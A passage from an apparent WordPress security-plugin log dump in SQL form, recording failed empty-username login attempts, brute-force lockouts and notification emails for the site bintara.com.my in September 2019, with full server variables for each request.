empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYATnkXpgmG5P@iB8kMaQAAAJg\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"193.34.145.18\";s:11:\"REMOTE_PORT\";s:5:\"57438\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYATnkXpgmG5P@iB8kMaQAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062990.8087\";s:12:\"REQUEST_TIME\";s:10:\"1569062990\";}}','notice','2019-09-21 10:49:52','2019-09-21 10:49:51',17798608,19289672,'https://bintara.com.my/2019/wp-login.php',1,0,'193.34.145.18'),(25338,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:49:18\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:49:18\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:04:18\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:04:18\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:49:19','2019-09-21 10:49:18',17882584,19288272,'https://bintara.com.my/wp/wp-login.php',1,0,'144.217.75.27'),(25339,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:49:19','2019-09-21 10:49:18',18088208,19288272,'https://bintara.com.my/wp/wp-login.php',1,0,'144.217.75.27'),(25340,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYAOViJ7D9Gn7wDPh8UwgAAANM\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"198.12.149.33\";s:11:\"REMOTE_PORT\";s:5:\"57380\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYAOViJ7D9Gn7wDPh8UwgAAANM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062969.9941\";s:12:\"REQUEST_TIME\";s:10:\"1569062969\";}}','notice','2019-09-21 10:49:31','2019-09-21 10:49:30',17798040,19288360,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.12.149.33'),(25337,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYALnkXpgmG5P@iB8kMSQAAAJg\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"144.217.75.27\";s:11:\"REMOTE_PORT\";s:5:\"50732\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYALnkXpgmG5P@iB8kMSQAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062958.3048\";s:12:\"REQUEST_TIME\";s:10:\"1569062958\";}}','notice','2019-09-21 10:49:19','2019-09-21 10:49:18',17797664,19288272,'https://bintara.com.my/wp/wp-login.php',1,0,'144.217.75.27'),(25335,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:48:44\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:48:44\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:03:44\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:03:44\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:48:45','2019-09-21 10:48:44',17882656,19289400,'https://bintara.com.my/wordpress/wp-login.php',1,0,'192.163.230.76'),(25336,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:48:45','2019-09-21 10:48:44',18088320,19289400,'https://bintara.com.my/wordpress/wp-login.php',1,0,'192.163.230.76'),(25332,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:48:43\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:48:43\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:03:43\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:03:43\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:48:44','2019-09-21 10:48:43',17884024,19289448,'https://bintara.com.my/2019/wp-login.php',1,0,'149.56.101.239'),(25333,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:48:44','2019-09-21 10:48:43',18089720,19289448,'https://bintara.com.my/2019/wp-login.php',1,0,'149.56.101.239'),(25334,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYAC1iJ7D9Gn7wDPh8UtwAAAMA\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"192.163.230.76\";s:11:\"REMOTE_PORT\";s:5:\"54562\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYAC1iJ7D9Gn7wDPh8UtwAAAMA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062923.9186\";s:12:\"REQUEST_TIME\";s:10:\"1569062923\";}}','notice','2019-09-21 10:48:45','2019-09-21 10:48:44',17797864,19289400,'https://bintara.com.my/wordpress/wp-login.php',1,0,'192.163.230.76'),(25330,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:48:29','2019-09-21 10:48:28',18090456,19289672,'https://bintara.com.my/test/wp-login.php',1,0,'149.56.38.19'),(25331,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYACnkXpgmG5P@iB8kMHgAAAJc\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"149.56.101.239\";s:11:\"REMOTE_PORT\";s:5:\"54038\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYACnkXpgmG5P@iB8kMHgAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569062922.999\";s:12:\"REQUEST_TIME\";s:10:\"1569062922\";}}','notice','2019-09-21 10:48:44','2019-09-21 10:48:43',17799384,19289448,'https://bintara.com.my/2019/wp-login.php',1,0,'149.56.101.239'),(25329,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:48:28\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:48:28\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:03:28\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:03:28\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:48:29','2019-09-21 10:48:28',17884360,19289672,'https://bintara.com.my/test/wp-login.php',1,0,'149.56.38.19'),(25326,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:48:11\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:48:11\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:03:11\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:03:11\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:48:12','2019-09-21 10:48:11',17889032,19289808,'https://bintara.com.my/2019/wp-login.php',1,0,'165.22.144.17'),(25327,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:48:12','2019-09-21 10:48:11',18095080,19289808,'https://bintara.com.my/2019/wp-login.php',1,0,'165.22.144.17'),(25328,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-@7fBTP0kPOVnb8jpJwAAAEs\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"149.56.38.19\";s:11:\"REMOTE_PORT\";s:5:\"59924\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-@7fBTP0kPOVnb8jpJwAAAEs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062908.0235\";s:12:\"REQUEST_TIME\";s:10:\"1569062908\";}}','notice','2019-09-21 10:48:29','2019-09-21 10:48:28',17799232,19289672,'https://bintara.com.my/test/wp-login.php',1,0,'149.56.38.19'),(25325,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 